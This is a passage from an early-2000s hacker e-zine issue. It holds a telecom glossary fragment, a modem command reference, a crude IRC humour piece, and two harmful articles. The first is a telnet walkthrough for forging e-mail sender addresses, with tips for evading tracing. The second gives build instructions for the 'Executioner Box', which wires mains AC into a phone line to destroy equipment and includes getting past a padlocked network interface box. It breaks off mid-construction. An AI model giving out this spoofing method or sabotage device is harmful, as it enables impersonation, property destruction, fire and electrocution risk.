SSP - Service Switching Point
STLWS - Supplementary Trunk-Line Work Station
STP - Signal Transfer Point
STS - Synchronous Transport Signals
STS-1 - Synchronous Transport Signal Level 1 (672 Channels/51.840 Mbps)
SU - Software Update
SVC - Swithced Virtual Circuit
T&A - Toll and Assistance
TAPI - Telecomminucation Application Programming Interface
TCAP - Transaction Capabilities Application Part
TCP-IP - Transmission Control Protocol-Internet Protocol
TCS - Terminating Code Screening
TDMA - Time Division Muiple Access
TDMS - Transmission Distortion Measuring Set
TIRKS - Trunk Integrated Record Keeping System
Title III - US Code - Title III
TMS - Time Multiplexed Switch
TNM - Total Network Management System (OSS-network)
TR - Operator Trouble Reports
TRCU - Transmission Rate Converter Unit
TRCU3 - Transmission Rate Converter Unit 3
TSICNTL - Time Slot Interchange Control
TSICOM - Time Slot Interchange Common board
TSMS - Telephone Status Monitor and Select
TSP - Telephone Service Provider
UNI - User-Network Interface
USB - Universal Serial Bus
UUCP - UNIX to UNIX Copy
VCDX - Very Compact Digital Switch
VCP - Visual Call Pickup
VDT - Video Display Terminal
VRCP - Voice Recognition Call Processing
WDLC - Wireless Digital Loop Carrier
XAIU - MultipleX Access Interface Unit
XAT - X.25 Protocol Over T1 Facility
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #11 - Article 14 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
E-Mail Forgery
By: Bi0s - (bi0s@StankDawg.com)
Want to know how to forge an e-mail? Want to send an e-mail to a friend with a fake
address such as: "bush@whitehouse.gov"? It sounds tough doesnt it? Its really a lot
easier than youd think. This is actually a pretty old trick, but I thought some "new to the
scene" hackers would like it. It is important to understanding email fundamentals if
nothing else. First of all, will you need any special software for this? Are any special
skills needed? Well, not really. If you can use telnet, you can do this. Telnet is a client
you can use to make a connection to a remote computer as though you were signed on
locally. This is a default tool included with Windows and most Linux distros.
Things to keep in mind:
Nowadays, everyone is worried about security. So, a lot of the mail servers you will run
into will force you to login. However some are still wide open! Not all these servers are
locked up. Some system admins just dont know, or just dont care about this. This is
usually most prevalent in schools and universities who tend not to update as often as
others. Sometimes, it is not locked up and it wont even ask you for a login. Also keep
in mind that the server most likely is recording everything you do. Most of the time, the
mail server prints to a log file. So, you may not want to do this from home. Also, even
though the e-mail has a forged name. If the target is smart enough, they can just look at
the header from the e-mail and determine what server the mail came from. As the IP
address will be in the header. This can be circumvented by learning more of the SMTP
commands and routing your email through a proxy server.
On to the Hacking:
A lot of webservers use Sendmail as their mail server. SMTP (simple mail transfer
protocol) is the protocol it uses. All this does is take care of the commands needed to
send mail. Usually a mail server can be found on port 25. So for example, if we wanted
to use the mail server at stankdawg.com, we would open up telnet, set the hostname to
stankdawg.com (usually by issuing the "open" command), and then set the port to 25.
Now connect.
When you first get there, you should see something like this:
---
220 stankdawg.com ESMTP Sendmail 8.12.5/8.12.5; Thu, 14 Nov 2002 18:39
:56 -0500
---
It wont do much else. Its sitting there waiting for your commands. Go ahead, talk to it.
The next step is to well, say "HI" to the server. And it will respond to you. Type:
"HELO stankdawg.com" and watch what happens.
---
HELO stankdawg.com
250 stankdawg.com Hello yourhostname.net [your IP here], pleased to meet you
---
Now wasnt that nice? This mail server is pleased to meet you. Ok, now lets get down
to it. You need to tell the server who this mail is coming from. Essentially, who YOU
are, or who youd like to be. Type this at the prompt: "MAIL FROM:
yourdesiredname@anysite.com"
---
MAIL FROM: bios@microsoft.com
250 2.1.0 bios@microsoft.com... Sender ok
---
Now as far as it knows, that sender is ok. Its cool with that e-mail address. Now we
want to tell it who will be receiving this mail. Type: "RCPT TO:
billgates@microsoft.com"
---
RCPT TO: billgates@microsoft.com
250 Recipient ok
---
All right, now we have the "to" and "from" info all entered and ready to go. Now lets
write this E-mail. Its done by typing DATA, then type in your message. When you are
finished typing the e-mail, hit enter.
---
DATA
Dear Bill,
You suck. And your software sucks. And thats sad.
250 Message accepted for delivery...
---
Now to disconnect from the server, just enter the command QUIT. Thats about it! Your
mail is on its way! Most typical users will not be able to tell the difference unless they
understand how to read the headers of their emails. Make them somewhat believable,
and you can have lots of fun! Like I said earlier, this is an older trick. Some of you may
not know about it. Some of you may. Either way, have fun with it. Enjoy yourself. And
never stop exploring.
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #11 - Article 15 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
The Hayes Modem Command Set
---------------------------
by: Magickal1
Here is a description of the Hayes Command Set. Most modems follow this
command set to large extent. If you lost your modem manual or never had
one in the first place, this reference might come in handy. I for
instance finally found out how to turn my modems speaker off: ATM0 --
Finally: Silence!
The modem initialization string consists of a series of commands. It
prepares the modem for communications, setting such features as dialing
mode, waits, detection of the busy signal and many other settings. Newer
modem communications programs reset the initializations string for you
according to which menu options you select, which features you enable,
etc..
For many years Hayes modems have been the standard. As the field of
modem manufactures has grown, most have adhered at least loosely to the
Hayes standard. The following is a partial list of the Hayes command set.
(called the "AT" commands). The Hayes Command Set can be divided into
four groups:
Basic Command Set
A capital character followed by a digit. For example, M1.
Extended Command Set
An "&" (ampersand) and a capital character followed by a digit. This is
an extension of the basic command set. For example, &M1. Note that M1
is different from &M1.
Proprietary Command Set
Usually started by either a backslash ("\"), or a percent sign ("%"),
these commands vary widely among modem manufacturers. For that reason,
only a few of these commands are listed below.
Register Commands
Sr=n where r is the number of the register to be changed, and n is the
new value that is assigned.
A "register" is computerese for a specific physical location in memory.
Modems have small amounts of memory onboard. This fourth set of
commands is used to enter values in a particular register (memory location).
The register will be storing a particular "variable" (alpha-numeric
information) which is utilized by the modem and communication software. For
example, S7=60 instructs your computer to "Set register #7 to the value
60".
Note
Although most commands are defined by a letter-number combination (L0,
L1 etc.), the user of a zero is optional. In this example, L0 is the
same as a plain L. Keep this in mind when reading the table below!
Here are some of the most important characters that may appear in the
modem initialization string. These characers normally should not be
changed.
AT
Tells the modem that modem commands follow. This must begin each line
of commands.
Z
Resets the modem to it's default state
, (a comma)
makes your software pause for a second. You can use more than one , in
a row. For example, ,,,, tells the software to pause four seconds. (The
duration of the pause is governed by the setting of register S8.
^M
Sends the terminating Carriage Return character to the modem. This is a
control code that most communication software translates as "Carriage
Return"
The Basic Hayes Command Set
In alphabetical order:
Table B.1. Basic Hayes Command Set
Command Description Comments
A0 or A Answer incoming call
A/ Repeat last command Don't preface with AT. Enter usually aborts.
B0 or B Call negotiation V32 Mode/CCITT Answer Seq.
B1 Call negotiation Bell 212A Answer Seq.
B2 Call negotiation Verbose/Quiet On Answer
D Dial Dial the following number and then handshake in orginate
mode.
P Pulse Dial
T Touch Tone Dial
W Wait for the second dial tone
, Pause for the time specified in register S8 (usually 2
seconds
; Remain in command mode after dialing.
! Flash switch-hook (Hang up for a half second, as in
transferring a call.
L Dial last number
E0 or E No Echo Will not echo commands to the computer
E1 Echo Will echo commands to the computer (so one can see what one
types)
H0 Hook Status On hook - Hang up
H1 Hook status Off hook - phone picked up
I0 or I Inquiry, Information, or Interrogation
This command is very model specific. I0 usually returns a
number or code, while higher numbers often provide much more
useful information.
L0 or L Speaker Loudness. Modems with volume control knobs will not
have these options.
Off or low volume
L1 Low Volume
L2 Medium Volume
L3 Loud or High Volume
M0 or M Speaker off M3is also common, but different on many brands
M1 Speaker on until remote carrier detected (i.e. until the
other modem is heard)
M2 Speaker is always on (data sounds are heard after CONNECT)
N0 or N Handshake Speed Handshake only at speed in S37
N1 Handshake at highest speed larger than S37
O0 or O Return Online See also X1 as dial tone detection may be
active.
O1 Return Online after an equalizer retrain sequence
Q0 or Q1 Quiet Mode Off - Displays result codes, user sees command
responses (e.g.OK)
Q1 Quiet Mode On - Result codes are suppressed, user does not see
responses.
Sn? Query the contents of S-register n
Sn=r Store Store the value of r in S-register n
V0 or V Verbose Numeric result codes
V1 English result codes (e.g.CONNECT, BUSY, NO CARRIERetc.)
X0 or X Smartmodem Hayes Smartmodem 300 compatible result codes
X1 Usually adds connection speed to basic result codes
(e.g.CONNECT 1200
X2 Usually adds dial tone detection (preventing blind dial, and
sometimes preventing AT0)
X3 Usually adds busy signal detection
X4 Usually adds both busy signal and dial tone detection
Z0 or Z Reset Reset modem to stored configuration. Use Z0, Z1etc.
for multiple profiles. This is the same as &F for factory
default on modems without NVRAM (non voltaile memory)
The Extended Hayes Command Set
Ampersand Commands
Table B.2. The Extended Hayes Command Set
Command Description Comments
&B0 or &B Retrain Parameters Disable auto retrain function
&B1 Retrain Parameters Enable auto retrain function
&B2 Retrain Parameters Enable auto retrain, but disconnect if no line
improvement over the period dictated by S7
&C0 or &C1 Carrier detect Signal always on
&C1 Carrier detect Indicates remote carrier (usual preferred
default)
&D0 or &D Data Terminal Ready(DTR Signal ignored (This is modem
specific, you must see your manual for information on this one!)
&D1 Data Terminal Ready(DTR If DTR goes from On to Off the modem goes
into command mode (Some modems only)
&D2 Data Terminal Ready(DTR Some modems hang up on DTR On to Off
transition (This is the usual preferred default)
&D3 Data Terminal Ready(DTR Hang up, reset the modem, and return to
command mode upon DTR
&F0 or &F Factory defaults Generic Hayes-compatible defaults.
This is usually a good thing to use in your init string,
since the &F1-&F3 settings can vary among modems, and they
may actually be the cause of connection problems.
(Since you never know exactly what Brand X's &F2 really changes.
On the other hand, it pays to try out the other options
below; many people's problems can be solved by replacing a
complicted init string with a simple &F2 or the like. However, if
building an init string, it's best to start with a simple &F, and not
use the "customized" form of defaults.
&F1 Factory Defaults Factory Defaults tailored to an IBM PC
compatible user
&F2 Factory Defaults Factory defaults for a Mac w/software
handshaking
&F3 Factory Defaults Factory defaults for a Mac w/hardware
handshaking
&G0 or &G Guard tones Disable guard tones
&K0 or &K Local flow control Disable local flow control
&K1 Local flow control Enable RTS/CTS hardware local flow control
&K2 Local flow control Enable XON/XOFF software local flow control
&K3 Local flow control Enable RTS/CTS hardware local flow control
&K4 Local flow control Enable XON/XOFF software local flow control
&L0 or &L Dial mode Select dial-up mode
&M0 or &M Error control mode Select asynchronous non-EC mode (the same
as &Q0)
&P0 or &P Pulse dialing ratio U.S./Canada pulse dialing 39% make / 61%
break ratio
&P1 Pulse dialing ratio U.K./Hong Kong pulse dialing 33% make / 67%
break ratio
&Q0 or &Q Error control mode Asynchronous non-EC more. No data
buffering. ASB disabled.
&Q5 Error control mode Select V.42 EC operation (requires flow
control)
&Q6 Error control mode Asynchronous mode with ASB (requires flow
control)
&Q8 Error control mode Select alternate EC protocol (MNP)
&Q9 Error control mode Conditional data compression: V.42bis = yes,
MNP5 = no.
&S0 or &S DSR action select Always on (default)
&S1 DSR action select Follows EIA specification (Active following
carrier tone, and until carrier is lost.)
&T0 or &T Self test Model specific self test on some modems
&U0 or &U Trellis code modulation Enable V.32 TCM
&U1 Trellis code modulation Disable V.32 TCM
&V0 or &V1 View active (and often stored) configuration profile
settings (or ATI4
&W0 or &W Store profile In NVRAM (&W0, &W1 etc. for multiple
profiles) Some settings cannot be stored. These often don't show on &V or
ATI4
&Y0 or &Y Select configuration loaded at power-up Load profile 0
(default)
&Y1 Select configuration loaded at power-up Load profile 1
&Zn=x Soft reset and load stored profile number n Note that all
items after the &Z on the command line are ignored
Backslash and Percent Commands
Table B.3. Backslash and Percent Commands
Command Description Comments
\A0 or \A Character maximum MNP block size 64 character maximum
\A1 Character maximum MNP block size 128 character maximum
\A2 Character maximum MNP block size 192 character maximum
\A3 Character maximum MNP block size 256 character maximum
%C0 or %C Data Compression Enable/Disable Disabled
%C1 Data Compression Enable/Disable MNP5 enabled
%C2 Data Compression Enable/Disable V.42bis (BTLZ) Enabled
%C3 Data Compression Enable/Disable MNP5 & V.42bis (BTLZ) Enabled
%D0 or %D Data compression 512 BLTZ dictionary size
%D1 Data compression 1024 BLTZ dictionary size
%D2 Data compression 2048 BLTZ dictionary size
%D3 Data compression 4096 BLTZ dictionary size
%E0 or %E1 Escape method ESCAPE DISABLED
%E1 Escape method +++AT method (default)
%E2 Escape method BreakAT method
%E3 Escape method BOTH methods enabled
%E4 Escape method Disable OK to +++
%E5 Escape method Enable OK to +++
\J0 or \J DTE Auto Rate Adjustment Disabled
\J1 DTE Auto Rate Adjustment DTE rate is adjusted to match carrier
rate.
\N0 or \N Connection type Normal connection (see below for
definitions)
\N1 Connection type Direction connection
\N2 Connection type MNP Auto-reliable connection
\N3 Connection type Auto-reliable connection
\N4 Connection type V.42bis reliable link with phase detection
\N5 Connection type V.42bis auto-reliable link with phase
detection
\N6 Connection type V.42 reliable link with phase detection
\N7 Connection type V.42 auto-reliable link with phase detection
A direct connection is a simple straight-through connection without any
error connection or data compression. In this case, the
computer-to-modem and modem-to-modem speeds must be identical.
A normal connection uses flow control (either software or hardware) to
buffer the data being sent or received, so that the modem can transmit
data at a different rate than the computer is actually sending or
receiving it. For example, a computer may send actual data at 57kbps, but
using compression, the modem only actually sends 28.8kbps. This is the
mode use by most modems.
A reliable connection is a type of normal connection; if, for some
reason, data compression or error correction cannot be established or
maintained, the connection will hang up. (In essence, such a modem ensures
that all connections are reliable, for it will hang up if the connection
isn't.)
Likewise, an auto-reliable connection is virtually the same, except
that the modem will try to renegotiate the connection in order to
establish a reliable connection. Again, this is the mode that most modems use.
S-Registers
Table B.4. S Registers
Register Range Default Function
S0 0-255 rings 1-2 Answer on ring number. Don't answer if 0
S1 0-255 rings 0 if S0 is greater than 0 this register counts the
incoming rings.
S2 0-127 ASCII 43 + Escape to command mode character
S2 >127 no ESC
S3 0-127 ASCII 13 CR Carriage return character
S4 0-127 ASCII 10 LF Line feed character
S5 0-32, 127 ASCII 8 BS Backspace character
S6 2-255 seconds 2 Dial tone wait time (blind dialling, see Xn
S7 1-255 seconds 30-60 Wait time for remote carrier
S8 0-255 seconds 2 Comma pause time used in dialing
S9 1-255 1/10ths second 6 Carrier detect time required for
recognition
S10 1-255 1/10ths second 7-14 Time between loss of carrier and hangup
S11 50-255 milliseconds 70-95 Duration and spacing of tones when tone
dialing
S12 0-255 1/50th seconds 50 Guard time for pause around +++ command
sequence
S36 Fallback options when error correction link fails:
7 Negotiation Failure Treatment
0 - Disconnect
1 - Establish Direct Connection
3 - Establish Normal Connection
4 - Establish an MNP connection if possible, else disconnect
5 - Establish an MNP connection if possible, else Direct Connection.
7 - Establish an MNP connection if possible, else Normal connection
S37 1 = 300 bps 0 Negotiation Speed (Intial handshake)
5 = 1200 bps
6 = 2400 bps
7 = 1200/75 bps (v.23 mode)
8 = 4800 bps
9 = 9600 bps
10 = 12000 bps
11 = 14400 bps
12 = 7200 bps
Many modems have dozens, even hundreds, of S registers, but only the
first dozen or so are fairly standard. They are changed with a command
like ATSn=N, and examined with ATSn? (e.g. AT S10=70 S1? would tell the
modem not to hang up for seven seconds should it not hear the answering
modem, and return the number of times the phone last rang.)
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #11 - Article 16 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
PRINGLES: Sour Cream & Onion.
by: rambox
yo, this is rambo. today we are discussing PRINGLES. Sour Cream & Onion,
Like a Motha fucka.
what first comes to mind when thinking about these k-radical chips? awesome?
kickass? Gnarly?
I went deep into the bowels of the internet.. to ask the people what they
think about these chips
My feelings on these pringles are simple, They simply kick your ass.
equipped with a TR0N sized buttload of flavour. That's a whole lotta
Flavour.
ramb0x: how do you feel about sour cream & onion pringles?
Erythr0xylum: haha
Erythr0xylum: dunno
ramb0x: thats a very undecsive answer, you should have said something like,
they haul my grandmothers ass!
-
ramb0x: how do you feel about sour cream & onion pringles?
kl3ptic: if i had an afro.. the gerbils living in them.. would be rocking.
-
ramb0x: how do you feel about sour cream & onion pringles?
duk0r: I think they kick ass
ramb0x: hell yes
duk0r: word
ramb0x: anymore thoughts on these wonderful chips?
duk0r: just pringles?
ramb0x: yes
duk0r: Bar-B-Q ones kick ass also
ramb0x: aw shit buddy, im getting all excited thinkin about them
duk0r: yeah well I just hope that im not getting you off
-
ramb0x: how do you feel about sour cream & onion pringles?
kuban kt: i like em
ramb0x: thats it? they don't make your camo panties wet?
kuban kt: iunno..not particularly..unless they're loaded with sour cream and
onion
ramb0x: well they shall be loaded indeed!
-
ramb0x: how do you feel about sour cream & onion pringles?
justuspost: good shit
ramb0x: damn right.
-
ramb0x: how do you feel about sour cream & onion pringles?
DigitalDamagee: MMM
DigitalDamagee: sounds like good shit
-
ramb0x: how do you feel about sour cream & onion pringles?
f0ned: haah
f0ned: umm
f0ned: theyer not bad
ramb0x: not bad?!?! it's a orgy of flavours in your mouth my fraind.
-
ramb0x: how do you feel about sour cream & onion pringles?
PLZ DIE THX: good
ramb0x: i'm going to need more input
PLZ DIE THX: yummy
-
ramb0x: how do you feel about sour cream & onion pringles?
z0zJenz0z: they're yummy?
ramb0x: you can do better than that
-
ramb0x (1:57:09 PM): sour cream and onion pringles.. GO
dropc0de (2:07:56 PM): *crunchcrunchcrumble*
---
i took it to #2600 on dalnet..
[1:37!04p] <rambox> how do you feel about sour cream & onion pringles?
[1:37!37p] <pneumonia> i like to rub them on my sphincter
[1:38!28p] <rambox> im speechless
[1:30!13p] <rambox> how do you feel about sour cream & onion pringles?
[1:30!35p] <|iquid> I feel the creater of them should be hung by his
testicles
[1:31!39p] <rambox> well that's not a pretty picture
[1:31!59p] <|iquid> it would make me laugh lots though
[1:30!10p] <rambox> how do you feel about sour cream & onion pringles?
[1:30!29p] <Optx> they're good
[1:31!06p] <rambox> care to say more about these elite pringles?
[1:31!41p] <Optx> all pringles are yum
[1:31!55p] <rambox> you're a gentleman and a scholar, thank you for your
time
[1:32!10p] <rambox> and if you care to take your aggressions out on a
pringles hater, /msg |iquid
[1:33:14] <Optx> <Optx> YOU PRINGLES HATING FAG
[1:33!19p] <Optx> <|iquid> I don't hate all pringles
[1:33!20p] <Optx> <|iquid> just sour cream & onion
[1:33!20p] <Optx> <Optx> ok
[1:33!20p] <Optx> <|iquid> get your facts straight
[1:33!33p] <rambox> perhaps we should castrate him?
[1:34!01p] <Optx> he doesn't hate all prinlges though
[1:34!13p] <rambox> yeah but still..
[1:37!34p] <rambox> how do you feel about sour cream & onion pringles?
[1:39!28p] * You were kicked from #2600 by fire-eyes (fed)
---
[1:46!03p] <rambox> skunx, how do you feel about sour cream & onion
pringles?
[1:47!21p] <skunx> the pringles can is about as big as my monster cock
[1:47!21p] <skunx> focktard
[1:47!49p] <Optx> you mean those 3 inch little travel cans?
[1:47!53p] <XariusX> lubejockey
[1:48!05p] <skunx> oh hell no.. those double packs..
[1:48!08p] <skunx> put those 2 together
[1:48!14p] <skunx> and you got my monster cock
[1:48!17p] <skunx> you fockenheimer
-
[1:26!47p] <rambox> how do you feel about sour cream & onion pringles?
[1:27!16p] <FMGV> they should burn in hell
[1:27!26p] <rambox> what?!?!
[1:27!49p] <rambox> you shall be tortured in hell by martha stewarts sexual
wiles for eternity my fraind
-
[1:29!19p] <rambox> how do you feel about sour cream & onion pringles?
[1:30!20p] <TaKTiX> sounds nasty
[1:30!20p] <TaKTiX> ;/
[1:30!47p] <rambox> you AND fmgv will burn, and be sexually molested by star
jones and barbara streissand
[1:36!48p] <TaKTiX> lol
---
and there you have it folks.. some people don't like sour cream & onion
pringles, most do.
as for the people who don't, i'm thinkin they very well could be robots from
planet Xalactagon.
with that said i'm going to go get some pringles.
rambox@spasm.org
rambox on @#mymeat @#outbreakzine
server: DALnet
aim: ramb0x
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #11 - Article 17 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
Executioner Box II - By Captain B
---------------------------------
Before anything else, let me make the purpose of both this, and the
original version of the Executioner Box crystal clear, (Since there seems
to have been some confusion about it). The Executioner Box I and II was
NOT designed or intended for the purposes of being connected to phones,
phone lines, and all other CPE (Customer Premise Equipment) and left
turned on/unattended. Both versions of the Executioner Box are meant for
the purposes of frying phones, modems, CID (Caller ID) units, fax
machines, answering machines, and all other telecom devices connected to any
given phone line, NOT people! To acheive this, you only need to keep
the Executioner Box I or II plugged in/turned on for a few moments. NOT 3
mins, or anything like that! Please be fully aware of the dangerous
nature of the Executioner Box I and II. ESPECIALLY when the Executioner
Box I or II is misused! Speaking of which, I will NOT be held responsible
for the blatant misuse of the Executioner Box I or II. Do not operate
while under the influence of alcohol, sleep aids and other narcotics, or
wanton stupidity. Hopefully, this lengthy (and perhaps all-inclusive)
disclaimer has routed out all potential ignorance. It should also be
noted that unless you isolate the subscriber line by disconnecting the
person's inside wiring from the telephone network at the TNI (Telephone
Network Interface) box, the over-voltage/current surge can do damage to
telecom equipment back at the CO (Central Office). To disconnect the
line from the phone network with newer model TNI boxes, plug a working
phone into the test jack on the customer side (left side) of the TNI box.
With older model TNI boxes, remove the plug from the short, black
colored line cord from the test jack. To locate where the TNI box is, look
for a grayish colored rectangular shaped box on an outside wall of a
building. And yes, it will say "Telephone Network Interface", or maybe
some slight variation of that on it. Some TNI boxes even have the
telephone company's name on it. But, some TNI boxes are placed too high up on
a wall of some buildings to be able to be reached easily. Also, you're
going to need either a standard Phillips or flat head screwdriver to
open the customer side of a TNI box, or you'll need a 3/8" hex nutdriver
to open the entire TNI box through the telco access side. If there's a
padlock on the TNI box, you'll have to open the TNI box from the telco
access side, since that sort of "bypasses" the padlock. However, some
buildings may not have a TNI box at all in the first place. The basic,
overall principal behind Executioner Box II remains EXACTLY the same as
for the first version of the Executioner Box; And that's to send more
voltage/current than the phones and all other phone equipment is able to
safely handle, thereby "frying" all phones and phone equipment
connected to a given phone line. For comparison sake, the highest normal
voltage on a phone line is during when a phone is ringing. (85-90 Volts AC,
depending on how far you live from your central office). Also, the
ringing AC voltage for phone lines is about 20Hz (cycles) per second, where
as a standard electrical outlet in a house has between 110-120VAC
(Volts AC) at around 60Hz per second. The more phones and phone equipment
there is connected to a given phone line, the more ringing power
(voltage/current) is needed to make all the phones ring. Because, of course,
all phones/phone equipment draw power from the phone line. Anyway, here
are the differences between the 1st and 2nd versions of the Executioner
Box...
-On/off cord switch
-More compact design (..of surface mount phone jack used in this)
Plus, I'll give more alternative ways to build this box. Let me point
out however that the more compact design of the phone jack used for
Executioner Box II only allows for the ability to fry phones and phone
equipment on up to 2 lines at once, as compared to up to 3 lines at once
for the original Executioner Box. To use Executioner Box II on up to 3
lines at once, substitute the Radio Shack RJ25 (3-line) surface mount
jack used in Executioner Box I instead of using the 2 line surface mount
jack mentioned here. Here's what you'll need to make this box...
-Wire cutters (The Radio Shack nippy cutters are great, but not
madatory)
-Wire stripper
-AC lamp cord (It has a twistable on/off switch built into the cord
-Small, surface mount phone jack (This can be bought at Home Depot
under the RCA brand name, or from K-mart under the Southwestern Bell brand
name for about $3 +tax)
The wire cutters/stripper can be bought at Radio Shack. A variety of
different types are availible, and no one particular type is mandatory to
buy for this project. Any type should do. As for the AC lamp cord, you
could simply cut one off an old lamp that either doesn't work, or you
don't plan on using anymore. Just as long as the AC cord is good, and
the on/off switch on the cord works, It's alright to use for building
this box. If you don't have an old lamp with a on/off switch on the cord,
you might find an old lamp for cheap at a garage sale, yard sale, flea
market, 2nd hand store, or perhaps even some junk shop. But, if you
want to buy an AC lamp cord you can be sure is in good working order, you
can buy one for $3.98 +tax at Home Depot stores. You'll have to cut the
light bulb socket off the end of the AC cord before it can be used for
making this box. Also, it should be mentioned that actually ANY working
AC power cord can be used for building Executioner Box II. But, with a
lamp cord, you have the ability to turn the power on/off more quickly
and easily. (Which, of course, can be pretty important with Executioner
Box I and II). If, however, you don't mind using an AC cord without a
built-in on/off switch, you may want to buy an electric shaver cord.
Since electric shaver cords are coiled, it prevents cord tangles, which is
helpful if you need to disconnect everything and pack up in a hurry. If
you can solder, and own a soldering iron, and solder, it might be
possible to solder up (add) a small SPST (Single Pole, Single Throw) on/off
switch. Having some rosin flux solder paste would help, too. (It makes
soldered joints stronger). To do this, you would also need to make a
hole big enough somewhere in the phone jack's chasis to put in the on/off
switch. And, with both the AC cord's wire leads, and the 4 phone wires
inside the fairly small confines of the phone jack, it makes adding
your own on/off switch all the more difficult. Of course, if you'd rather,
you can actually use any size 1 piece, self contained, surface mount
phone jack for making this box. ("Self contained" means the screw
terminals (42A block) and phone jack are built together in 1 piece, the back
half, and the outer cover attaches over it). If you still want to try
adding your own switch into the phone jack chasis, and building
Executioner Box II in that way, just make sure to buy an SPST switch that
supports enough amperage (current). Look on the switch's package to find out
the voltage/current ratings. Smaller switches tend to support less
current. Running more voltage or current into a switch above the
voltage/current ratings is risky. The same holds true for all electronic
components. It's possible to use foreign standard (220-240 Volts AC) with
Executioner Box II if you buy the 40 watt step-up voltage converter, (Part#
273-1411 for about $33 +tax) and the foreign adapter travel kit, (Part#
273-1407 for about $12 +tax) both from Radio Shack. But remember, the
more voltage/current is used when running this box, the more dangerous
it gets. Besides, I happen to know fact from testing the Executioner Box
I that 110-120 Volts AC is enough to do job of frying phones and phone
equipment. In other words, using 220-240 Volts AC is not a must.
-Construction-
First, remove the outer cover from the surface mount phone jack. Then,
take the AC cord and cut about 5-6 feet of it (or desired length) using
wire cutters, or a wire cutter/stripper. If you use an AC extension
cord for making this box, you obviously want the plug at one end, then
5-6Ft. of cord afterward. (So, cut the extension outlets off the other
end). Now, using the wire cutters, carefully cut a small notch up the
center between the 2 wires on the AC cord. (The Radio Shack nippy cutters
with their small size are good for this job). After cutting the small
notch, grab each half of the AC cord, and very slowly and carefully pull
apart the 2 wires on the cord a bit more. Give yourself maybe about 4-5
inches length of each of the 2 wire leads. Now that you have each
insulated wire seperated at the end of the cord, you'll need to strip the
insulation off each insulated wire lead at the ends. Carefully strip off
about an inch or so of insulation on each wire end. If you have solder
and soldering iron, you can also "tin the tips" of the AC cord wire
leads after they've been stripped, if you so desire. Otherwise, you may
want to simply twist the copper strands of the wire together with your
fingers, to make the wire leads easier to work with. Now, take the
screwdriver and loosen, but don't remove, the screws holding the yellow and
black wires. Also loosen, but don't remove, the screws holding the red
and green wires. Attach the yellow wire to the same screw holding the
red wire. After that, attach the black wire to the screw holding the
green wire in the same manner. If you want, you can now remove the other 2
screws now that no wires are no longer attached to those screws. Note:
if you have 6 wires (Red, green, yellow, black, blue, and white) you're
using a 3-line jack. For a 3 line jack, take the screwdriver and
loosen, but don't remove, the screws holding the blue, white, yellow, and
black wires. Also loosen, but don't remove, the screws holding the red and
green wires. Attach the blue and yellow wires under the same screw
holding the red wire. You can attach it underneath the 2 washers on the
screw just like red wire is attached, or attach it any other way. After
you're done with that, attach the white and black wires to the screw
holding the green wire in the same manner. If you want, you can now remove
the other 4 screws now that no wires are no longer attached to those
screws. Now, attach one of the stripped wire ends from the AC cord to one
of the screws holding the phone wires, making sure to wrap it clockwise
firmly around the screw under the screw's head. Then, tighten that
screw down using the screwdriver. Repeat the process with the other
stripped wire end from the AC cord, attaching it to the other screw, and
tightening the screw down. Run the AC cord through the opening in the side
of the jack, snap the phone jack's outer cover back on, and you're done.
By the way, there's no need to worry about correct polarity
(Ring/Negative, Tip/Positive) when hooking up the wire leads of the AC cord to the
screws since the voltage you'll be using is AC, (Alternating Current)
which repeatedly and constantly changes direction of current flow. Only
DC (Direct Current) has only 1 proper current flow direction.
Executioner Box I or II can also be hooked up to any corded phone if you modify
a handset cord by cutting off the handset cord plug on one end of the
handset cord, and crimping on a line cord plug at that same end. Then,
